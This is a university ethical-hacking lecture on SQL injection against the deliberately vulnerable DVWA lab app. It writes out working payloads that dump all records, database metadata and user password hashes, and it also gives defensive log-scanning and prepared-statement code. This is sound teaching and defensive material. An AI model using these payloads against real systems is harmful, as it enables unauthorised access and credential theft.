Lecture10 WebPentest SQLInjection

The lecture covers web pentesting, focusing on SQL Injection as a critical vulnerability in web applications. It discusses the OWASP Top 10 web security risks, the use of intentionally vulnerable applications like DVWA for practice, and various SQL injection techniques to exploit these vulnerabilities. Additionally, it highlights defensive measures against SQL injection attacks and the importance of understanding web application security principles.

Uploaded by phamgiaphong127

INFO3002 Ethical Hacking Principles and Practice

Lecture 10: Web Pentesting Overview, SQL Injection

School of Computer, Data and Mathematical Sciences


Western Sydney University
1
Lecture outline
After looking at the five stages of pentesting,
we now study the pentesting of a particular type of
application: web applications.

■ Top Web Vulnerabilities
■ The intentionally vulnerable web applications as targets
■ SQL Injection
■ Defence against SQL Injection

2
Web Applications
■ Web applications are a necessity today.
▬ Search engine
▬ Online shopping, banking
▬ News portal
▬ Online social networks, etc.

■ The security of web applications is a critical issue.

3
Top Vulns in Web Applications
■ The renowned Open Web Application Security Project
(OWASP) Top 10 project surveys industry to identify the
10 most critical security risks in web applications.
▬ URL: https://owasp.org/www-project-top-ten/
▬ The past releases of the Top 10 occurred in 2004, 2007, 2010, 2013,
2017 and 2021.

■ The Top 10 risks for 2017 and 2021 are shown on the next slide.

4
OWASP Top 10 Web Security Risks
From 2017 to 2021, the following changes happened in the Top 10: three new categories
were added, four categories had their name and scope changed, and some categories were
consolidated.

5
The three vulns from Top 10 to discuss
■ In this subject, we'll discuss the pentesting of the following 3
vulns from the Top 10 in both 2017 and 2021:
▬ Injection: injecting malicious commands into a website through user
input
o The injected commands can be SQL, OS shell, XPath, etc.
o SQL injection is the most common among injection attacks.
▬ Broken Access Control: stealing cookies to bypass authentication,
etc.
▬ Cross Site Scripting (XSS): attackers exploit flawed web applications
to inject malicious JavaScript into browsers.
o This belongs to injection as well.

6
Lecture outline
■ Web Vulnerability Overview
■ The intentionally vulnerable web applications as targets
■ SQL Injection
■ Defence to SQL Injection

7
Target Web Applications for Pentesting
■ There are several intentionally vulnerable web applications
installed on Metasploitable2.
▬ Mutillidae
▬ DVWA (Damn Vulnerable Web Application)
▬ phpMyAdmin
▬ TWiki
▬ dav (WebDav)

■ They are installed in the /var/www directory

8
Target Web Applications (cont'd)
■ On Kali, start Firefox and enter http://<IP address of Metasploitable2>; you'll
see the Metasploitable2 index page listing the vulnerable applications.
▬ NB: Don't use 'https' here, which will make the pentesting hard.

Then, you can click a link to interact with a vulnerable web application.

9
DVWA – The chosen target for this unit
■ Damn Vulnerable Web Application (DVWA) is a
PHP/MySQL web application that is damn vulnerable.
▬ Website: https://github.com/ethicalhack3r/DVWA

■ The version installed on Metasploitable2 is V1.0.7.
▬ We will use this version, as it is easy for learning.

■ Its latest version is much more complicated, and thus not
adopted in Metasploitable2.

10
Three Security Levels in DVWA
■ To help you understand how to develop secure web
applications, DVWA has three security levels.
▬ High – This level is to give an example of good coding practice. This
level aims to be secure against known vulnerabilities.
▬ Medium – This level is to give an example where the developer has
tried but failed to fully secure an application.
▬ Low - This level has no security consideration at all.

■ By default, the security level is set to high. However, we
need to switch it to low in this subject so that we can
experiment with our web pentesting tools.

11
PHP-IDS in DVWA
■ PHP-IDS (PHP Intrusion Detection System) is a software
package that can filter user input against a blacklist of
potentially malicious code.
■ PHP-IDS is installed in DVWA, but it is disabled by
default.
■ We will not study PHP-IDS in this unit, so you should keep
it disabled, i.e., untouched.

12
DVWA Usage
■ The default username and password to access DVWA are
admin:password.
■ When you enter username and password, Firefox will
prompt you that the connection is not secure, but you
should still go ahead.
■ After logging in, you should see an interface shown in the
next slide.

13
DVWA Usage – Interface

[Screenshot of the DVWA interface. The left-hand links lead to web pages containing
web vulnerabilities; click a link to play with a vuln. The footer shows the current
username and security level.]


14
DVWA Usage – Change Security Level
■ The 'DVWA Security' button allows you to change the security
level of the website.
▬ The first thing you do is to change the level to 'Low' and then 'Submit'
before pentesting.

15
DVWA Usage – Reset Database
■ During your pentesting, the 'Setup' button allows you to
reset the database used by DVWA in case you damage it.
▬ You don't need to set up the database when you run the DVWA
website for the first time. It's already set up for you.

16
DVWA Source Code Overview
■ You are required to understand the basic source code of
DVWA.
■ The code for each vulnerable web page is in the following
directory: /var/www/dvwa/vulnerabilities/

For instance, the 'sqli' folder contains the php files for
the SQL injection vuln, and the 'xss_r' folder the Reflected
XSS vuln, and the 'xss_s' folder the Stored XSS vuln, etc.

17
DVWA Source Code for Each Vuln
■ If you 'cd' into the folder for a vuln, say 'sqli', you will see that it
contains an 'index.php', a 'source' folder, and a 'help' folder.

■ The 'index.php' is the first page to load.
■ The 'source' folder contains the php files for the implementations
of the three security levels.
■ The 'help' folder contains only one file: 'help.php', which will
display help info on this vuln.
18
The ‘index.php’ for each vuln

[Source listing of index.php. It loads the php file for the selected security
level based on the cookie value, which is set when you selected the security level.]

19
View DVWA Source Code

Besides viewing source by opening files, you can also
click the 'View Source' button at any web page to see
its source code.

In addition, you can click the 'View Help' button to
get hints on the vuln. The hints are displayed by the
'help.php' mentioned before.

20
Compare code of different security levels

When viewing source, you can further click the
'Compare' button to display the source code of all
three security levels to see their differences.
21
Lecture outline
■ Web Vulnerability Overview
■ Target vulnerable web applications
■ SQL Injection
■ Defence to SQL Injection

22
SQL Injection
■ SQL Injection (SQLI) means to insert malicious code into
SQL commands executed by the web server through user
input.
▬ Note: MySQLi means MySQL Improved, which is a set of improved
PHP functions for accessing a MySQL database. So MySQLi and
SQLI refer to completely different things.

■ Next, we will use the 'SQL Injection' page in DVWA to give
an SQLI example.

23
Remember to Change Security Level to
'Low'
■ The first thing you do is to change the level to 'Low' and then
'Submit' before pentesting.

24
SQLI in DVWA

Click ‘SQL Injection’, you’ll see this page.

Click 'View Source', and you'll see that the user input will
be used to compose the following SQL statement:
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Click 'View Help', and you'll learn that the valid user IDs are
'1', '2', …, '5' in the database.

25
SQLI − Valid Input
■ Let’s try the valid input ‘1’ and then submit. The resulting SQL
statement will be:
▬ SELECT first_name, last_name FROM users WHERE user_id = '1'

■ You’ll be returned the first name and surname of the user with ID ‘1’
correctly.

26
SQLI to disclose all records
■ Enter the crafted input random' or '0'='0. Then, the resulting
SQL will be:
▬ SELECT first_name, last_name FROM users WHERE user_id='random' or
'0'='0'
▬ Note: '0'='0' will be true, such that the entire WHERE clause is true,
thus returning all records.

27
SQLI to disclose all records (cntd)
■ Then, you'll be returned all 5 records in the 'users' table below. (NB: the ID
field shows your actual input.)

28
SQLI to disclose DB server version
■ Enter the crafted input random' or '0'='0' union select null, version() #.
The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE user_id='random'
or '0'='0' union select null, version() #'

■ Notes:
▬ 'SELECT' and 'select' are the same in SQL.
▬ 'union' is an SQL operator to combine the results of two 'select' statements.
o Condition: both 'select' statements must select the same number of columns. The
'null' can be used to generate a dummy column.

▬ '#' introduces a comment until the end of a line in MySQL. It is used here to
comment out the last single quote, otherwise there will be a syntax error.
▬ 'version()' is a MySQL function to return the version of the MySQL server.

29
SQLI to disclose server version (cntd)
■ Then, the MySQL server version is displayed in the last line.

30
SQLI to disclose username for DB
access
■ Enter the crafted input random' and 1=0 union select null, user() #.
The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' and 1=0 union select null, user() #'

■ Notes:
▬ 1=0 will return false, so the first select statement will return nothing. This
is an improvement over the previous SQLI: removing the info we do not
want.
o '1'='0' can also be used here, returning false as well.
o With quotes, SQL compares strings; without quotes, SQL compares numbers.
▬ 'user()' is a MySQL function to return the username and the hostname of
the DB server for accessing the DB.

31
SQLI to disclose username for DB
access (cntd)
■ The username 'root' and hostname 'localhost' are displayed in
the last line:

32
SQLI to disclose database name
■ Enter the crafted input random' union select null, database() #.
The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select null, database() #'

■ Notes:
▬ user_id='random' will most likely return false, so the first select
statement will return nothing. This further simplifies the previous SQLI.
▬ 'database()' is a MySQL function to return the name of the database accessed
by the current database connection.

33
SQLI to disclose database name (cntd)
■ The database name 'dvwa' is displayed in the last line:

34
SQLI to disclose table name
■ Enter the crafted input random' union select null, table_name
from information_schema.tables where table_name like 'user%' #.
The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select null, table_name from
information_schema.tables where table_name like 'user%' #'

■ Notes:
▬ 'information_schema' is a built-in database in MySQL, storing general
info about all databases managed by MySQL.
▬ The 'tables' table in 'information_schema' stores all table names in all
databases.
▬ In reality, a hacker doesn't know the table name is 'users' when he/she
plays with this 'User ID' interface. So here he/she guesses that the table
name starts with 'user'.
35
SQLI to disclose table name (cntd)
■ All such table names are returned after 'Surname' below.

■ Hackers will need to do further work to determine the name is 'users'. We
will omit this step here.

36
SQLI to disclose column names in
'users' table
■ Enter the crafted input random' union select table_name,
column_name from information_schema.columns where
table_name='users' #. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select table_name, column_name from
information_schema.columns where table_name='users' #'

■ Notes:
▬ The 'columns' table in 'information_schema' database stores all column
names of all tables of all databases managed by MySQL.
▬ The above statement will return all column names in 'users' table.

37
SQLI to disclose column names in
'users' table (cntd)
■ The column names are displayed after 'Surname', while the table name
'users' is displayed after 'First name'.

38
SQLI to disclose all usernames and
password hashes in 'users' table
■ Enter the crafted input random' union select user, password
from users #. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select user, password from users #'

■ Notes:
▬ From the outputs in the previous slide, hackers can guess that the field
containing the username is called 'user' and the field containing the password is
called 'password'.
▬ So hackers will use the above SQL statement.

39
SQLI to disclose all usernames and
password hashes 'users' table (cntd)
■ The usernames are displayed after 'First name', while the password hashes
are displayed after 'Surname'.

Then, hackers can use password cracking tools to try to recover the passwords!

40
Notes on password cracking tools
■ Popular password cracking tools include:
▬ Cain and Abel
▬ John the Ripper
▬ Aircrack-ng, and many more

■ This unit will not cover the details of password cracking.
However, it will be covered by other security-related units
offered by our school such as Computer Security, Network
Security, etc.

41
Summary to SQLI techniques
■ Use '0'='0' or 0=0 to generate an always-true condition.
■ Use union to combine two select statements, in which the
latter one displays what you want.
▬ The two statements must select the same number of columns. To
achieve this, you can use 'null' to generate dummy columns.

■ Remember the MySQL functions such as version(), user(),
etc. for returning database information.
■ Use comment characters such as # to comment out the
code that causes syntax errors.

42
A complete list of commenting
syntaxes supported in MySQL
■ From the # character to the end of the line.
■ From double dash -- to the end of the line.
▬ It is required that the second dash be followed by at least
one whitespace or control character (such as a space, tab, etc.).

■ From /* to the following */, allowing multiple lines.

In previous examples, we only used '#'. You can use
other supported commenting syntaxes as well.

43
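As an added example (not from the lecture or from DVWA), the script below turns the technique summary above and the MySQL comment rules into detection logic run over constructed Apache-style access-log lines: it decodes the id parameter of each request and flags the always-true comparisons, union select, comment terminators and information_schema / version() / user() / database() probes described in the preceding slides. The log lines, the parameter name and the function names are assumptions made for this example.

```python
"""Detection logic for the SQLi techniques summarised in this lecture, run
over constructed access-log lines. Added example; not part of DVWA or the
lecture slides."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style log lines (not real traffic). The id values are the
# URL-encoded form a browser sends for the inputs shown in the earlier slides.
LOG_LINES = [
    '10.0.0.5 - - [10/May/2024:10:00:01 +1000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=1&Submit=Submit HTTP/1.1" 200 4521',
    '10.0.0.5 - - [10/May/2024:10:00:09 +1000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=random%27+or+%270%27%3D%270&Submit=Submit HTTP/1.1" 200 5210',
    '10.0.0.5 - - [10/May/2024:10:00:31 +1000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=random%27+and+1%3D0+union+select+null%2C+version%28%29+%23'
    '&Submit=Submit HTTP/1.1" 200 4600',
    '10.0.0.5 - - [10/May/2024:10:01:02 +1000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=random%27+union+select+null%2C+table_name+from+information_schema.tables'
    '+where+table_name+like+%27user%25%27+--+&Submit=Submit HTTP/1.1" 200 4890',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# x=x or 'x'='x': a comparison whose two sides are the same literal.
ALWAYS_TRUE_RE = re.compile(r"""(['"]?)(\w+)\1\s*=\s*\1\2""")
UNION_SELECT_RE = re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I)
PROBE_RE = re.compile(
    r"\binformation_schema\b|\b(?:version|user|database)\s*\(\s*\)", re.I
)


def mysql_comment_start(text):
    """Index where a MySQL comment would begin, or -1. Rules from the slide:
    '#' to end of line; '--' only when followed by whitespace or a control
    character; '/*' opens a block comment. String literals are not skipped,
    which is the conservative choice for attacker-controlled input."""
    for i, ch in enumerate(text):
        if ch == "#" or text.startswith("/*", i):
            return i
        if text.startswith("--", i) and i + 2 < len(text):
            nxt = text[i + 2]
            if nxt.isspace() or ord(nxt) < 0x20:
                return i
    return -1


def extract_param(line, name="id"):
    """Pull and URL-decode one query parameter from a log line's request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    values = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return values[name][0] if name in values else None


def analyse_input(value):
    """Return the list of technique indicators found in a decoded input."""
    reasons = []
    if ALWAYS_TRUE_RE.search(value):
        reasons.append("always-true comparison")
    if UNION_SELECT_RE.search(value):
        reasons.append("union select")
    if mysql_comment_start(value) != -1:
        reasons.append("comment terminator")
    if PROBE_RE.search(value):
        reasons.append("schema or server-info probe")
    return reasons


def scan_log(lines):
    """Map 1-based line numbers to indicators, for flagged lines only."""
    findings = {}
    for n, line in enumerate(lines, 1):
        value = extract_param(line)
        if value is None:
            continue
        reasons = analyse_input(value)
        if reasons:
            findings[n] = reasons
    return findings


if __name__ == "__main__":
    for n, reasons in scan_log(LOG_LINES).items():
        print(f"line {n}: {', '.join(reasons)}")
```

The benign request with id=1 produces no findings; each of the three crafted inputs from the earlier slides is flagged with the techniques it uses. The `--` rule is checked literally as the slide states it, so `--x` without a following whitespace or control character is not treated as a comment.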
Automated SQLI tools
■ Besides conducting SQLI manually, you can also use
automated SQLI tools such as SQLMAP, w3af, etc.
■ The most notable one is SQLMAP, which can automatically
detect and exploit SQLI flaws and even gain admin access
to database servers.
▬ A very cool tool.
▬ Website: https://sqlmap.org

■ Although the automatic tools are very powerful, manual
SQLI remains the most effective way to exploit SQLI vulns.

44
Lecture outline
■ Web Vulnerability Overview
■ Target vulnerable web applications
■ SQL Injection
■ Defence to SQL Injection

45
Guidelines to SQLI Defence
■ Grant the least privileges needed to each database account.
■ In the web app, use an appropriate account to access the
database.
▬ E.g., DVWA shouldn't use the account 'root' to access the DB.

■ Always sanitize users' inputs.
▬ Validate users' inputs according to requirements
o type, syntax, etc.
▬ Escape ', ", and some other special characters by calling the
mysqli_real_escape_string() function
■ Fix the semantics of the SQL query by using a prepared
statement, so that user input can only ever be a value, never SQL syntax.
▬ This is the most effective method, but not required in this subject.
46
Source code of high.php for SQLI
[Source listing of high.php with two callouts: stripslashes() removes the backslashes
from the string; mysql_real_escape_string() escapes the following characters: ',
", ASCII 0, \n, \r, \, and Ctrl-Z.]

■ Note: this version of DVWA is a little old. The 'mysql_' set of PHP functions
is deprecated, so you should use the corresponding 'mysqli_'
function today.
▬ E.g., mysql_real_escape_string() should be replaced by
mysqli_real_escape_string() today.
▬ Both functions add the escape character \ before these seven special
chars such that they lose their syntactic meaning.

47
Source code of high.php for SQLI (cntd)
■ First, stripslashes() removes the backslashes.
▬ NB: it will NOT remove forward slashes.

■ Then, mysqli_real_escape_string() adds backslashes
to escape special characters.
▬ E.g., ' becomes \', " becomes \", etc., such that they lose their syntactic
meaning in SQL statements.
▬ Only the following seven characters ', ", ASCII 0, \n, \r, \, and Ctrl-Z will
be escaped.
▬ These special characters will not be removed, because they need to be
stored in the database in many scenarios.
o E.g., the database may need to store a paragraph of text, which can contain
quotes and newline characters, etc.

48
Source code of high.php for SQLI (cntd)
■ The stripslashes() manual & example:
▬ https://www.w3schools.com/php/func_string_stripslashes.asp

■ The mysqli_real_escape_string() manual & example:
▬ https://www.w3schools.com/php/func_mysqli_real_escape_string.asp

49
Examples of using stripslashes( ) and
mysqli_real_escape_string( )
■ Suppose the PHP variable $str_x contains:
He /is/ \"humorous\".
The output of stripslashes($str_x) will be:
He /is/ "humorous".
■ Suppose the PHP variable $str_y contains:
He 'is' "humorous"!.
The output of mysqli_real_escape_string($str_y) will be:
He \'is\' \"humorous\"!.

50
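The following Python model is an added example, not DVWA's own code and not part of these slides. It puts together the low-level query built by string concatenation (slide 25), the stripslashes() / mysqli_real_escape_string() pair from high.php (slides 47 to 50) and the prepared statement recommended on slide 46, and runs the all-records input from slide 27 through each. sqlite3 stands in for MySQL, the rows and placeholder password values are constructed, and because SQLite string literals do not use backslash escapes the escaped (high-level) statement is returned as text rather than executed.

```python
"""Model of DVWA's 'SQL Injection' page at three defence levels.

Added example, not DVWA's own code. sqlite3 stands in for MySQL; the rows,
function names and placeholder password values are constructed for this
example.
"""
import sqlite3

# Constructed rows in the shape of DVWA's 'users' table (placeholder hashes).
SAMPLE_USERS = [
    (1, "Alice", "Adams", "alice", "<hash-placeholder-1>"),
    (2, "Bob", "Baker", "bob", "<hash-placeholder-2>"),
    (3, "Carol", "Chen", "carol", "<hash-placeholder-3>"),
    (4, "Dan", "Diaz", "dan", "<hash-placeholder-4>"),
    (5, "Eve", "Evans", "eve", "<hash-placeholder-5>"),
]

# The seven characters mysqli_real_escape_string() escapes; MySQL renders the
# control characters with their letter forms (\0, \n, \r, \Z).
ESCAPES = {
    "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
}


def build_db():
    """Create an in-memory table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_low(conn, user_id):
    """Low level: the input is pasted into the statement, so a quote in the
    input ends the string literal and the rest becomes SQL syntax."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def stripslashes_equiv(s):
    """Simplified PHP stripslashes(): drop each backslash and keep the
    character after it (so a doubled backslash becomes one); forward slashes
    are untouched."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def mysqli_real_escape_string_equiv(s):
    """Equivalent of mysqli_real_escape_string() for the seven characters."""
    return "".join(ESCAPES.get(ch, ch) for ch in s)


def build_query_high(user_id):
    """High level (DVWA 1.0.7): stripslashes(), then escape, then concatenate.
    Returned as text only: SQLite string literals do not use backslash
    escapes, so this MySQL-syntax statement is shown rather than executed."""
    safe = mysqli_real_escape_string_equiv(stripslashes_equiv(user_id))
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{safe}'"


def lookup_prepared(conn, user_id):
    """Prepared statement: the SQL text is fixed and the input is bound as a
    value, so it cannot change the statement's structure."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    payload = "random' or '0'='0"  # the all-records input from slide 27
    print("low, input '1':    ", lookup_low(conn, "1"))
    print("low, payload:      ", lookup_low(conn, payload))
    print("high, payload ->   ", build_query_high(payload))
    print("prepared, payload: ", lookup_prepared(conn, payload))
```

With the low-level function the crafted input returns all five rows; with the prepared statement the same input is compared as a plain value against user_id and returns nothing, while the valid input '1' still returns its row. The two string helpers reproduce the stripslashes() and mysqli_real_escape_string() outputs shown on the slide above.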
Example Short Answer Question:
■ What are the Top 3 web security risks released by
OWASP in 2021?

51
Lecture Summary
■ Attacks on web applications are very common today due
to the prevalence of web applications.
■ SQL Injection is a major type of attack on web
applications.
■ SQL Injection attacks can be prevented if web
applications sanitize user inputs properly.

52
References
■ Manual SQLI:
▬ https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/index.html

■ The web links mentioned in the slides of this lecture

Big reminder:
• Lab 9 will be due next week. Please start it
asap!

53
